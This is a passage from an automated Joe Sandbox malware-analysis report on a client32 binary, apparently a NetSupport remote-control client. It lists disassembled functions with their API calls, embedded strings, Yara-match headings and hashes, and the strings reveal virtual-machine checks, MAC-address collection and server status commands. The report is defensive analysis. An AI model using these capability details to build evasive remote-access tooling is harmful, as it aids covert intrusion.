                                                                                                                                          • Part of subcall function 68910D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?), ref: 68910D9F
                                                                                                                                          • Part of subcall function 68910D40: _free.LIBCMT ref: 68910DAF
                                                                                                                                          • Part of subcall function 68910970: LoadLibraryA.KERNEL32(ws2_32.dll), ref: 689109A6
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 689109C3
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 689109CD
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,socket), ref: 689109DB
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,closesocket), ref: 689109E9
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 689109F7
                                                                                                                                          • Part of subcall function 68910970: FreeLibrary.KERNEL32(00000000), ref: 68910A6C
                                                                                                                                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 68910FF6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ntohl), ref: 6891100C
                                                                                                                                        • _malloc.LIBCMT ref: 68911020
                                                                                                                                        • _free.LIBCMT ref: 689110E5
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 689110FA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Library$Load_free$AdaptersAddressesFree_malloc
                                                                                                                                        • String ID: ntohl$ws2_32.dll
                                                                                                                                        • API String ID: 4086026317-4165132517
                                                                                                                                        • Opcode ID: 51e75394bff360df27eb73129d2d16eac5cac4da230b71e6f38303574b9b6b86
                                                                                                                                        • Instruction ID: 88f51382038e04a602d47fe7421d2ab531e8f58744f0932e5529782d60ffc822
                                                                                                                                        • Opcode Fuzzy Hash: 51e75394bff360df27eb73129d2d16eac5cac4da230b71e6f38303574b9b6b86
                                                                                                                                        • Instruction Fuzzy Hash: AE414F75D0C21D9BDB24DF24CC406AAB3B9BB66604F5094A9D8DAA7200EF35DA84CF90
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: DATA$FLAGS$FROM$LEN$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$nclen == datalen
                                                                                                                                        • API String ID: 269201875-852054525
                                                                                                                                        • Opcode ID: 3af49d428bd768503bedb98992708804344ffb17db642bb476d7aefa23de74ed
                                                                                                                                        • Instruction ID: 99721d62375979d268432da07027cff11c5e3df6c6fcb8ae4eed5ef8eb146ebf
                                                                                                                                        • Opcode Fuzzy Hash: 3af49d428bd768503bedb98992708804344ffb17db642bb476d7aefa23de74ed
                                                                                                                                        • Instruction Fuzzy Hash: 23419EB5D042196FEB00DFB89C40AFFBAF8AF59254F944539E815E7200F735DA058BA1
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F7F26
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F7FF9
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F8047
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F8052
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,-000397EB,?), ref: 688F806A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 920729587-4141403093
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 688F102B
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$VUUU$base64.cpp$cchOut >= cchWorst$pszOut
                                                                                                                                        • API String ID: 501242067-340907830
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089F9C
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FB6
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FC6
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FD7
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FE9
                                                                                                                                          • Part of subcall function 11089F90: _calloc.LIBCMT ref: 11089FFB
                                                                                                                                        • timeGetTime.WINMM ref: 1108B14F
                                                                                                                                        • timeGetTime.WINMM ref: 1108B17D
                                                                                                                                        • timeGetTime.WINMM ref: 1108B1BF
                                                                                                                                        • timeGetTime.WINMM ref: 1108B202
                                                                                                                                        Strings
                                                                                                                                        • BuildDynamicPalette(%d*%d), took %d ms, xrefs: 1108B1CF
                                                                                                                                        • SampleData(%d*%d,%d), took %d ms, xrefs: 1108B18F
                                                                                                                                        • BuildLUT(p12to8), took %d ms, xrefs: 1108B20B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _calloc$Timetime
                                                                                                                                        • String ID: BuildDynamicPalette(%d*%d), took %d ms$BuildLUT(p12to8), took %d ms$SampleData(%d*%d,%d), took %d ms
                                                                                                                                        • API String ID: 323206698-2628575008
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F7C8D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D18
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D68
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D6F
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,00000000,-000397EB,?), ref: 688F7D83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 920729587-4141403093
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
                                                                                                                                        • API String ID: 4104443479-3492528137
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: IsA()$NSMString.cpp$iAt<=m_nLength$iAt>=0$pszStr!=NULL
                                                                                                                                        • API String ID: 4104443479-3876480746
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _sprintf
                                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$0000000000$02004C4F4F50$VIRTNET$VMware$Virtual
                                                                                                                                        • API String ID: 1467051239-555777999
                                                                                                                                        • Opcode ID: 61b8b888ae01c7f0b32c010d6f4b6bb3397c70a2704f6edac5e4215f632aff28
                                                                                                                                        • Instruction ID: 58312b9145586ee43070cc7566ac22c1b4d77a466a96ba0d129608e503cf38d8
                                                                                                                                        • Opcode Fuzzy Hash: 61b8b888ae01c7f0b32c010d6f4b6bb3397c70a2704f6edac5e4215f632aff28
                                                                                                                                        • Instruction Fuzzy Hash: 5E21D67590822C7FCB10D7B49C20AFA77F85B9A20AF80459CE9D992140EA35E6088BA0
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6890DA47
                                                                                                                                        • CreateThread.KERNEL32(00000000,?,?,?,00000000,?), ref: 6890DA6A
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?), ref: 6890DA97
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?), ref: 6890DAA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                        • String ID: 0/#v$Refcount.cpp$hThread
                                                                                                                                        • API String ID: 3360349984-878792544
                                                                                                                                        • Opcode ID: d1c73c6dd1b4e9f971e55d9e17fa5459025f91d5d7a129c773ef0e862d8fc37f
                                                                                                                                        • Instruction ID: 25bfdbffeb4fdcc5d99e0a27a48e8cf550afac68ef5c5763bc90921a369d1231
                                                                                                                                        • Opcode Fuzzy Hash: d1c73c6dd1b4e9f971e55d9e17fa5459025f91d5d7a129c773ef0e862d8fc37f
                                                                                                                                        • Instruction Fuzzy Hash: A0015E76348301BFE7308E99CC49F1B7BACEB85725F504228FA1996280D6B0E8058BA0
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 68910BB8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68910BCB
                                                                                                                                        • _malloc.LIBCMT ref: 68910BF3
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _free.LIBCMT ref: 68910BEB
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 68910C10
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                        • String ID: GetAdaptersInfo$IPHLPAPI.DLL
                                                                                                                                        • API String ID: 1157017740-2359281783
                                                                                                                                        • Opcode ID: c7ffc6d33af0e9aef0c03635c6f2e7d682a853a3b7e5ed69a4f91ef53538e23a
                                                                                                                                        • Instruction ID: b9c4419db9b9b36ebb8f30d536c7ccd70271553687dea71dedc5789f6f5a9d08
                                                                                                                                        • Opcode Fuzzy Hash: c7ffc6d33af0e9aef0c03635c6f2e7d682a853a3b7e5ed69a4f91ef53538e23a
                                                                                                                                        • Instruction Fuzzy Hash: FFF0A4BA64C316ABD7309B749C84D1F77ECAFA5608740482CE5ABC7500EA36E450CB20
                                                                                                                                        APIs
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 110ED19C
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 110ED1DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3489003387-0
                                                                                                                                        • Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                        • Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
                                                                                                                                        • Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                        • Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 1101F1B1
                                                                                                                                          • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
                                                                                                                                        • GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
                                                                                                                                        • _fputs.LIBCMT ref: 1101F313
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                                                        • String ID: ChatPath$X
                                                                                                                                        • API String ID: 2661292734-3955712077
                                                                                                                                        • Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                        • Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
                                                                                                                                        • Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                        • Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$_free_memmove
                                                                                                                                        • String ID: MSG$SENDER
                                                                                                                                        • API String ID: 3114187808-3313591108
                                                                                                                                        • Opcode ID: 21ae85002aa0165152030598d53187be95bda16f2e640fd0c38c60808e7fbd07
                                                                                                                                        • Instruction ID: a0c2d3b3ee04a84256c76a3048c02ac6fb613f5bd16ef0d42e502a1a9db9caa0
                                                                                                                                        • Opcode Fuzzy Hash: 21ae85002aa0165152030598d53187be95bda16f2e640fd0c38c60808e7fbd07
                                                                                                                                        • Instruction Fuzzy Hash: 18416371D04228ABEB20EB688C01BAEB7F4BB55314F9481D9E45CA7240EF319A95CF95
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68905CBF
                                                                                                                                          • Part of subcall function 689033A0: wsprintfA.USER32 ref: 689034FD
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                                                        • String ID: 305090$CLIENT_NAME=%s$CMD=CLEAR_PIN$PIN=%s$PINserver
                                                                                                                                        • API String ID: 2968883096-3209596228
                                                                                                                                        • Opcode ID: 92a5ca89cc78a6e9e8ef6ab4893d89530e569d15430060d8b4a2675a95013691
                                                                                                                                        • Instruction ID: 895f67c1284a37fc5b5a6b06dcd6baacafd86fa21f96ca611e48c8aa822c563f
                                                                                                                                        • Opcode Fuzzy Hash: 92a5ca89cc78a6e9e8ef6ab4893d89530e569d15430060d8b4a2675a95013691
                                                                                                                                        • Instruction Fuzzy Hash: 9E315675D10228ABDB20DB78DC41FEE77B8EB88214F9086D9E50DE7181EF319A458F60
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F6D0A
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F6D72
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,688FB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 688F6DCC
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,000000C8,7622E010,?,688FB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 688F6DD6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                        • API String ID: 199729137-1434219782
                                                                                                                                        • Opcode ID: aac37bb7a8ce3dfe24ec4a71043cafa7fbfef28fe0b59c602f4de8e733ceff5c
                                                                                                                                        • Instruction ID: 11bbf9a16718f1d5bbdbf981d2cc8405d7dd7706282414ca751352aa3d09c83e
                                                                                                                                        • Opcode Fuzzy Hash: aac37bb7a8ce3dfe24ec4a71043cafa7fbfef28fe0b59c602f4de8e733ceff5c
                                                                                                                                        • Instruction Fuzzy Hash: 0E319C75A082A99FDB20EF58CC80AE9B3B4FB49345F5049B9EA89D7201C6719DC5CF50
                                                                                                                                        APIs
                                                                                                                                        • _strtok.LIBCMT ref: 688FB941
                                                                                                                                        • _free.LIBCMT ref: 688FB952
                                                                                                                                        • _malloc.LIBCMT ref: 688FB970
                                                                                                                                        • _free.LIBCMT ref: 688FB999
                                                                                                                                        • _strtok.LIBCMT ref: 688FB9A5
                                                                                                                                          • Part of subcall function 68907F80: _memset.LIBCMT ref: 68907F9F
                                                                                                                                          • Part of subcall function 68907F80: LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,688FB916,?,00000100,00000006,00000001), ref: 68907FAC
                                                                                                                                          • Part of subcall function 68907F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68907FCB
                                                                                                                                          • Part of subcall function 68907F80: _malloc.LIBCMT ref: 68907FFB
                                                                                                                                          • Part of subcall function 68907F80: wsprintfA.USER32 ref: 6890807C
                                                                                                                                          • Part of subcall function 68907F80: _free.LIBCMT ref: 68908110
                                                                                                                                          • Part of subcall function 68907F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 6890811C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$Library_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
                                                                                                                                        • String ID: MACADDRESS=%s
                                                                                                                                        • API String ID: 905297018-795797190
                                                                                                                                        • Opcode ID: 05e87ec95422d81ef61765ac427e67edf67ff2da72bd1490bc9a7f900ede9426
                                                                                                                                        • Instruction ID: 88154e1a93801641de259d8f9a92ac5da742b680d8a5960200e2b950c21b53c1
                                                                                                                                        • Opcode Fuzzy Hash: 05e87ec95422d81ef61765ac427e67edf67ff2da72bd1490bc9a7f900ede9426
                                                                                                                                        • Instruction Fuzzy Hash: 7C219B76B4821937D71092785C45FFA72BC8FA6754FC005A4ED945B280FA72D90682D0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        • _free.LIBCMT ref: 688FBCBA
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FBCEC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: APPTYPE=%d$CMD=USERSTATUS$DEPT=%s$USER=%s
                                                                                                                                        • API String ID: 3180605519-731630419
                                                                                                                                        • Opcode ID: 4a37c99e00abc95d339f40d9c38ec0fb37575e44eeca6e10e6917d404323fc25
                                                                                                                                        • Instruction ID: 1f10e47900d5b56420f2cf345f60e70d3fdffb78768062e2c617cced27713e14
                                                                                                                                        • Opcode Fuzzy Hash: 4a37c99e00abc95d339f40d9c38ec0fb37575e44eeca6e10e6917d404323fc25
                                                                                                                                        • Instruction Fuzzy Hash: 802181BA900208BBDB00DBA8CC41FFF777C9F94614F808918AA15B7144EB31EA05C7E1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FAF0A
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FAF39
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
                                                                                                                                        • String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
                                                                                                                                        • API String ID: 1628406020-2994292602
